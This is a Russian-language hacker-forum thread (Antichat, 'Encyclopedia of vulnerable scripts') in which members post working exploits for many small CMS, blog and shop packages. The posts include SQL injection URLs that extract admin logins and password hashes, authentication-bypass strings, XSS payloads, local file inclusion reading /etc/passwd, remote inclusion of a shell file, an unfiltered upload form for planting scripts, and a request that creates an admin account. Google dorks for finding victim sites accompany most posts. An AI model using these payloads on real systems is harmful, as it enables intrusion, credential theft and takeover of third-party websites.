Энциклопедия уязвимых скриптов

Discussion in 'Веб-уязвимости' started by DIAgen, 1 Jun 2006.

  1. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    398
    Likes Received:
    152
    Reputations:
    19
    OrkZ CMS


    XSS: (Все версии)

    Code:
    index.php?set=news&mc=read&date=<script>alert(document.cookie)</script>
    Пример:

    Code:
    http://orkz.pogran.com/index.php?set=news&mc=read&date=<script>alert(document.cookie)</script>
    p.s: cms не использует бд, на php инклуды ещё не смотрел)
     
    1 person likes this.
  2. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    PHPSurveyor

    Офф.сайт - http://www.phpsurveyor.org
    В файле templates.php есть такой кусок:
    Code:
    if ($action == "upload") {
     //Подгружаем файл в директорию :о))
     $the_full_file_path = $publicdir."/templates/".$templatename . "/" .   
    	$_FILES['the_file']['name']; 
     if ([email="!@move_uploaded_file($_FILES"]!@move_uploaded_file($_FILES[/email]['the_file']['tmp_name'], $the_full_file_path)) {
      echo "<strong><font color='red'>"._ERROR."</font></strong><br />\n";
      echo _IS_FAILUPLOAD."<br /><br />\n";
      echo "<input $btstyle type='submit' value='"._GO_ADMIN."' onClick=\"window.open('$scriptname', '_top')\">\n";
      echo "</td></tr></table>\n";
      echo "</body>\n</html>\n";
      exit;
     } 
    }
    
    Никакой фильтрации, вообще никакой...

    Тоесть можем залить файл к ним на сервер и взять пермишенны www.

    Формочка будет вылгядеть примерно так:
    Code:
    </table></form></td></tr><tr><td></td>
    <td align='right' valign='top'>
    <form enctype='multipart/form-data' name='importsurvey' action='http://victim/phpsurveyor/admin/templates.php' method='post'> <table><tr class='btstyle' >
    <td align='right' valign='top' style='border: solid 1 #000080'>
    <input class='btstyle' name="the_file" type="file" size="7">
    <br /><input type='submit' value='Upload' class='btstyle' >
    <input type='hidden' name='editfile' value=''>
    <input type='hidden' name='screenname' value='Welcome Page'>
    <input type='hidden' name='templatename' value='default'>
    <input type='hidden' name='action' value='upload'>
    </td>
    </table>
    </form>
    Если все будет хорошо, то ссылка на файл будет выглядеть так:
    http://victim/phpsurveyor/templates/default/file.php

    К сожалению експлоит был написан до меня, милворм крушит труды% (
     
    1 person likes this.
  3. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    Found : halkfild
    Dork : "Powered By Aqua Cms"
    Vendor: http://www.aquacms.net/
    Advisory URL: http://crackfor.me/bugtraq/aquacms.v1.1.txt
    Mail : bugtraq[d0g]crackfor.me


    SQL-injections:
    Need:
    magic quotes = off


    vuln file: /droplets/functions/base.php
    vuln code:

    PHP:
    65:// Check the status of the orders

    if(isset($_COOKIE["userSID"])) {
    $sqltable $sitename."_orders";
    $selck $_COOKIE["userSID"];
    mysql_select_db($database$dbconnect);
    $query_cartcheck "SELECT SID FROM $sqltable WHERE SID = '$selck' AND status = 1";    
    $cartcheck mysql_query($query_cartcheck$dbconnect) or die(mysql_error());
    $row_cartcheck mysql_fetch_assoc($cartcheck);
    $totalRows_cartcheck mysql_num_rows($cartcheck);

    if (
    $totalRows_cartcheck != 0) {
        
    $user_ip_address $_SERVER['REMOTE_ADDR'];
        
    $dt=date("YmdHis"); 
        
    $UID="$dt$user_ip_address";
        
    setcookie("userSID"$UIDtime()+36000);
    }

    }
    PoC: COOKIE: userSID='[foo]

    Auth bypass
    Need:
    magic quotes = off

    vuln file: /admin/index.php
    vuln code:

    PHP:
    10:
    if (isset(
    $_POST['username']) == TRUE) {
        
    $uusername $_POST['username'];
        
    $upassword $_POST['password'];
        
    $sqltable $sitename."_users";
        
    mysql_select_db($database$dbconnect);
        
    $query_getuser "
        SELECT * 
        FROM 
    $sqltable 
        WHERE username = '
    $uusername
        AND password = '
    $upassword
        AND groups != '' 
        "
    ;
        
    $getuser mysql_query($query_getuser$dbconnect) or die("Unable to select database");
        
    $row_getuser mysql_fetch_assoc($getuser);
        
    $totalRows_getuser mysql_num_rows($getuser);
        
        if (
    $totalRows_getuser == 1) {
            
    $uid $row_getuser['id'];
            
    $uun $row_getuser['username'];
            
    $ugr $row_getuser['groups'];
            
    $setwsuser $uid.":".$uun.":".$ugr
            
    //setcookie("wsuser", $setwsuser, time()+36000, '/');
            //header("Location: index.php");
        

        
    // User logon: end
    }

    PoC: POST: username='[foo]
    Exploit: POST: username=crackfor.me'+or+1=1+limit+1+--+


    p.s. for cracking md5 hashes use http://crackfor.me - online md5 crack service :)
     
    _________________________
    3 people like this.
  4. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    288
    Likes Received:
    402
    Reputations:
    159
    Очередная мелкая цмс

    Сайт производитель: http://www.adaptcms.com
    Продукт: AdaptCMS
    Версия: 1.3
    SQL-inj
    Есть RewriteRule ^page-([^/]+).html$ index.php?view=page&id=$1 , однако есть исходники! =)
    Тянем хеш админа
    LFI в админке
    Загрузка произвольных файлов
    P.S. На офф.сайте не работает! =(
     
    1 person likes this.
  5. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    496
    Likes Received:
    533
    Reputations:
    158
    Lil' CMS
    download: http://www.lilcms.com/lilcms/lilcms2.zip
    dork: "Developed from orginal code by Lil' CMS"

    Произвольное чтение и запись файлов
    уязвимый код:
    PHP:
    if($_POST["select"] && $_POST["Submit"]=="Load") {
    //Readfile
    $text=file_get_contents($CPATH.$_POST["select"]);
    }


    if(
    $_POST["editing"] && $_POST["Submit"]=="Update") {
    //Write file
    $filename $CPATH.$_POST["editing"];
    $text=$_POST["textfield"];
    $fp fopen ($filename"w");
    $text stripslashes($text);
    fwrite($fp$text);
    fclose($fp);
    }
    эксплуатирование:
    достаточно изменить POST-пакет, отсылаемый серверу, т.е. поправить значение переменной select, в случае чтения файла(select=../../../../../../../etc/passwd), и editing, в случае записи в файл(создает файл, если файл с таким именем отсутствует)

    (с) Iceangel_
     
    #105 Iceangel_, 16 Apr 2009
    Last edited: 16 Apr 2009
    1 person likes this.
  6. fker

    fker Member

    Joined:
    26 Nov 2008
    Messages:
    135
    Likes Received:
    64
    Reputations:
    -1
    webylon cms v 2.5

    Found : fker
    Vendor: http://webylon.ru/
    Type vuln: SQL injection
    Vulnerable scripts:
    bigimg.cgi
    place.cgi
    bigimg_galery.cgi
    Parameter:id

    POC,s:
    Code:
    http://[target]/bigimg.cgi?id={SQL}
    Code:
    http://[target]/cgi/place.cgi?id={SQL}
    Code:
    http://[target]/bigimg_galery.cgi?id={SQL}
    sample:
    https://forum.antichat.ru/showpost.php?p=1229194&postcount=8915
     
  7. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    496
    Likes Received:
    533
    Reputations:
    158
    уязвимости SCMSv1

    Уязвимости SCMS
    download: http://futurekast.com/fcms/php/SCMSv1.zip
    dork: "Powered by SCMSv1"

    LFI
    уязвимый код:
    PHP:
        if (!isset($_GET['p'])) { // no page specified -> load default page
            
    include("../SCMSv1/includes/default.txt");
        } else include(
    "includes/" $_GET['p'] . ".txt");
    эксплуатирование:
    Code:
    index.php?p=../../../../../../../etc/passwd%00
    если стоят мк, используем альтернативу нуллбайту http://raz0r.name/articles/null-byte-alternative/

    (с) Iceangel_
     
    2 people like this.
  8. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Kensei Board 1.1

    Kensei Board 1.1 (раньше DestinyBB)
    Сайт: http://kenseiboard.com/

    Ужасный форум.. его сурсами только детей пугать на ночь :\


    SQL-injection
    При magic_quotes_gpc=off

    Уязвимый код:
    forum.php
    PHP:
    $forum $_GET['f']; //forum number

    $result 
    mysql_query"SELECT * FROM forums_lf2713 WHERE id='$forum'" );
    $row mysql_fetch_array$result );
    $header $row['header'];

    <font face='arial' color='#ffffff' class='font1' size='1'>&nbsp;&nbsp;<b>$header</b></font>
    Эксплуатация:
     
    #108 ElteRUS, 20 Apr 2009
    Last edited: 21 Apr 2009
  9. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Bahar Download Script
    D

    Download: http://www.aspdepo.org/indir2.asp?id=1085

    Турки жгут))

    Code:
    http://www.site.com/patch/aspkat.asp?kid=28%20union+select+all+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin

    ltaweb Alısveris Sistem

    Download: http://www.aspindir.com/goster/5631

    Code:
    http://shop/urunler.asp?catno=38%20union+select+all+0,1,uname, upass,4,5,6,7,8,9,10,11,12+from+users
    BloofoxCMS
    Download: http://www.bloofox.com/download.21.html

    magic_quotes_gpc = Off
    register_globals = On

    LFI:

    Code:
    http://site/plugins/spaw2/dialogs/dialog.php?lang=../../../../../../../../../../../../etc/passwd%00 
    wsCMS
    Google dork: Powered by wsCMS

    SQL Inj:
    Code:
    http://site.com/news.php?id=-1234+union+select+1,concat(username,char(58),user_ password)+from+phpbb_users+limit+1,1--
    Blind SQL Inj:

    Code:
    http://site.com/news.php?id=1 and substring(@@version,1,1)=4
    http://site.com/news.php?id=1 and substring(@@version,1,1)=5
    Virtual War

    Google Dork: Powered by Virtual War

    Code:
    http://site.com/extra/online.php?n=_member%20WHERE%20memberid=-999%20UNION%20SELECT%200,%43%4F%4E%43%41%54%28%6D% 65%6D%62%65%72%69%64%2C%30%78%33%41%2C%6E%61%6D%65 %2C%30%78%33%41%2C%70%61%73%73%77%6F%72%64%29%2C%3 2%0A%20FROM%20vwar_member%20%20/*
    Online Universal Payment System System

    Code:
    http://site.com/index.php?read=../../../../../../../../../../etc/passwd
     
    #109 [underwater], 20 Apr 2009
    Last edited: 20 Apr 2009
    4 people like this.
  10. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    PastelCMS 0.8.0

    PastelCMS 0.8.0
    Сайт: http://pastel.pri.ee/

    SQL-injection
    При magic_quotes_gpc=off

    Уязвимый код:
    index.php
    PHP:
    . . .
    $sql_up $mysql->query("SELECT * FROM ".$conf['mysql_prefix']."menu_struct WHERE id='$_GET[id]'");
    $menu_up $mysql->fetch_array($sql_up);
    . . .
    Эксплуатация:
    Authorization bypass
    При magic_quotes_gpc=off

    Уязвимый код:
    admin.php
    PHP:
    if($_GET['log'] == 'in') {
        if(
    $_POST['user'] != '' && $_POST['pass'] != '') {
            
    $sql $mysql->query("SELECT * FROM ".$conf['mysql_prefix']."users WHERE user='$_POST[user]' AND pass='".md5($_POST['pass'])."'");
            
    $count $mysql->num_rows($sql);
    . . .
    Эксплуатация:
    В поле Username: ' or 1=1#
    В поле Password что угодно
     
    #110 ElteRUS, 21 Apr 2009
    Last edited: 21 Apr 2009
    2 people like this.
  11. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    eXopera

    Download: http://www.exopera.be/

    Уязвимость в файле product.php:
    Blind SQL Inj:

    Code:
    http://site.com/product.php?catid=1 and substring(@@version,1,1)=4
    Code:
    http://site.com/product.php?catid=1 and substring(@@version,1,1)=5

    cpCommerce


    Download: http://cpcommerce.cpradio.org/downloads.php

    Уязвимость в файле document.php:
    Blind SQL Inj:

    Code:
    http://site.com/document.php?id_document=1 and substring(@@version,1,1)=4
    
    Code:
    http://site.com/document.php?id_document=1 and substring(@@version,1,1)=5
     
    2 people like this.
  12. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    758
    Likes Received:
    1,053
    Reputations:
    291
    CMSSite Vulnerabilities

    CMSSite Vulnerabilities

    Found by: Dimi4 [UASC]
    Date: 22.04.09


    XSS (search.php) :

    Code:
    [B]http://localhost/CMSSite/[COLOR=Red]search.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=0&y=0[/COLOR][/B]
    LFI: admin.php

    PHP:
        if(file_exists("$admin_dir/".$_REQUEST["mode"].".php") &&  $_REQUEST["mode"] != "delete" &&  $_REQUEST["mode"] != "logout")
        {
            include(
    "$admin_dir/".$_REQUEST["mode"].".php");
        }
    Code:
    /admin.php?mode=[B][COLOR=Red][path][/COLOR][COLOR=PaleGreen]//////////////////[..][/COLOR][/B]
     
    10 people like this.
  13. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Limeware CMS
    Сайт: http://limeware-cms.com/

    SQL-injection
    При magic_quotes_gpc=off

    Уязвимый код:
    displayNews.php
    PHP:
    . . .
     if (
    strlen($_GET['id']) > 0) {
                    
    $this->id $_GET['id'];
                } else {
                    
    $this->id 0;  
    . . .
     
    $query sprintf("SELECT id,title,author,date,body FROM %s WHERE id = '%s'"$this->tblnews$this->id);
            
    $this->newsResult $this->DB_executeQuery($query$this->newsLink);
    . . .                         
    Эксплуатация:
     
    5 people like this.
  14. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    496
    Likes Received:
    533
    Reputations:
    158
    Уязвимости Ninja Blog

    Уязвимости Ninja Blog
    download: http://www.ninjadesigns.co.uk/enter/blog.zip
    dork: "Powered by Ninja Designs"

    RFI

    /entries/index.php
    уязвимый код:
    PHP:
     <?php
    if (isset($_GET["cat"])) {
        
    $page $_GET["cat"].'.txt';
            if (
    file_exists($page))  {                               
                echo 
    "<br /><a href=\"index.php\">< Back</a>";
                @include (
    "$page");
    эксплуатирование:
    Code:
    /entries/index.php?cat=ftp://login:pwd@host/shell.txt%00
    

    (с) Iceangel_
     
    #114 Iceangel_, 26 Apr 2009
    Last edited: 26 Apr 2009
    6 people like this.
  15. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    TeamCal Pro Version 3.2.003
    Downloads:http://www.lewe.com/index.php?option=com_docman&task=cat_view&gid=112&Itemid=45
    Dork:Powered by TeamCal

    можем добавить админа

    уязвимый код

    /addprofile.php
    Code:
    /**
     * Check if allowed 
     */
    if (!checkAuth("admin")) {
       // Not authorized. Get outta here
       jsReload("index.php"); <- тут java-redirect!
    }
    
    эксплуатация:
    Code:
    /addprofile.php 
    отправляем POST запрос типа
    username=1234567&password=1234&password2=1234&lastname=&firstname=&title=&position=&idnumber=&phone=&mobile=&email=&birthday=&opt_gender=ut_male&uo_language=english&uo_defgroup=default&lbxNotifyGroup=All&opt_usertype=ut_admin&custom1=&custom2=&custom3=&custom4=&custom5=&customFree=&customPopup=&btn_add=Add
    все
    admin:1234567
    pass:1234

    (с)Rubaka
     
    1 person likes this.
  16. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    496
    Likes Received:
    533
    Reputations:
    158
    PluggedOut Blog
    download: http://downloads.sourceforge.net/pluggedout/blog199i.zip
    dork: "Powered by PluggedOut Blog"

    LFI

    уязвимый код:

    index.php

    PHP:
    if ( isset($_REQUEST["entryid"]) ){

            if (
    is_numeric($_REQUEST["entryid"])){
                
    $html html_view_entry($_REQUEST["entryid"])
    cмотрим функцию html_view_entry в файле html.php

    PHP:
    function html_view_entry($entryid){
        
    /--/
        
    // Build the page
        
    $html build_page($sql_list,$sql_view,$sql_archive,$sql_categories,$sql_comments);
            
        return 
    $html;

    cмотрим функцию build_page, в этом же файле


    PHP:
    function build_page($sql_list,$sql_view,$sql_archive,$sql_categories="",$sql_comments=""){

        global 
    $theme;
        
        
    // work out the current theme (allow for an override though)
        
    if (isset($_REQUEST["theme"])){
            
    $theme $_REQUEST["theme"];
        } else {
            
    $theme theme_get_name();
        }

        
    // include the theme (in order for following function calls to work)
        
    if (file_exists("themes/".$theme."/theme.php")){
            require 
    "themes/".$theme."/theme.php";
        } else {
            
    header("Location: problem.php?f=build_page&p=theme_not_found");
        }


    эксплуатирование:
    Code:
    index.php?entryid=1&theme=../../../../../../../etc/passwd%00
    

    (с) Iceangel_
     
    2 people like this.
  17. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    FineArtPost

    Download: http://www.fineartpost.com

    XSS:
    Code:
    http://www.site.com/display_images.php?u_id=%22%3Cscript%3Ealert(1)%3C/script%3E%22

    SQL Inj:

    Code:
    http://www.site.com/public/display_images.php?u_id=-210%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--
    minimal-ablog 0.4


    Download : http://code.google.com/p/minimal-ablog/downloads/list


    SQL Inj:
    Code:
    http://www.site.com/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8--
    Загружаем любые файлы с правами админа: http://www.site.com/admin/uploader.php
     
  18. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    496
    Likes Received:
    533
    Reputations:
    158
    Уязвимости InTerra Blog Machine 1.70

    Уязвимости InTerra Blog Machine 1.70
    download: http://essentialmind.com/files/interra_en.zip
    dork: "Powered by InTerra Blog Machine"

    SQL-injection(требования: magic_quotes=off)
    уязвимый код:
    index.php
    PHP:
    switch($_GET['action']){
    /--/
    case 
    'section':    {
    include(
    "actions/section.php");
    break;
    }
    /--/
    /actions/section.php (напрямую к нему не обратится, хтаццесс в папке мешает)

    PHP:
      if(eregi('(.*)/$',$_GET['section'])){
            
    $_GET['section'] = substr($_GET['section'],0,-1);
        }                 
        
    //figure out section settings (if any)
        
    if(!$section $db->getRow("SELECT * FROM int_category WHERE name = '".$_GET['section']."'")){
            
    //is there a page maybe? (V 1.70)
            
    if($page $db->getRow("SELECT * FROM int_pages WHERE url = '".$_GET['section']."'")){
    /--/
    эксплуатирование:
    Code:
    index.php?action=section&section=1'+and+1=2+union+select+1,2,version(),4--+
    PoC:
    Code:
    http://evilbotan.ru/?action=section&section=1'+and+1=2+union+select+1,2,user(),4--+
    (обратите внимание на имя домена, злой ботан =) )

    (с) Iceangel_
     
    #118 Iceangel_, 28 Apr 2009
    Last edited: 28 Apr 2009
    2 people like this.
  19. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    lcxBBportal

    Download : http://code.google.com/p/lcxbbportal/downloads/list/lcxbbportal-0.1.A2.tar.gz

    Vuln File: portal/includes/portal_block.php

    Viln Code:
    Code:
    include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
    includes/acp/acp_lcxbbportal.php
    $phpbb_portal_path = $phpbb_root_path . 'portal/';
    require_once($phpbb_portal_path . 'includes/portal_block.' . $phpEx);
    require_once($phpbb_portal_path . 'includes/adm_portal_block.' . $phpEx);
    include($phpbb_root_path . 'includes/functions_display.' . $phpEx);
    Exploit:

    Code:
    http://site.com/portal/includes/portal_block.php?phpbb_root_path=../../../../../../../etc/passwd
    http://site.com/includes/acp/acp_lcxbbportal.php?phpbb_root_path=../../../../../../../etc/passwd

    photoDiary 1.2


    Download:
    http://code.google.com/p/photodiary/downloads/list

    Vuln File: admin/index.php


    Vuln Code:
    Code:
    $act = $_GET['act'];
    .....
    if($act=="edit" || $act=="new"){
    $id = $_GET['id'];
    Exploit:
    Code:
    http://site.com/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--
    Например на оффе:
    http://photodiary.webgriffe.com/demo/admin/index.php?act=edit&id=-56%20union%20select%201,2,version(),4--
     
    #119 [underwater], 29 Apr 2009
    Last edited: 29 Apr 2009
  20. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    496
    Likes Received:
    533
    Reputations:
    158
    Уязвимости RevolutionBB 1.6(возможно и более ранние версии)
    download: http://www.revbb.net/releases/revbbv1-6.zip
    dork: "RevolutionBB 2008-2009"

    SQL-injection(требования: magic_quotes=off)

    Инъекции есть буквально в каждом скрипте, приведу всего лишь 1 пример:

    уязвимый код:

    composemsg.php
    PHP:
    $id $_GET['id'];
    $privatem mysql_query(
                    
    "SELECT *
                    FROM
                    "
    .PREFIX."pms
                    WHERE id='
    $id'"
    );
    $private mysql_fetch_array($privatem);
    эксплуатирование:
    Code:
    composemsg.php?id=1'+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10+from+[b]<prefix>[/b]_members--+

    (с) Iceangel_
     
    1 person likes this.
Loading...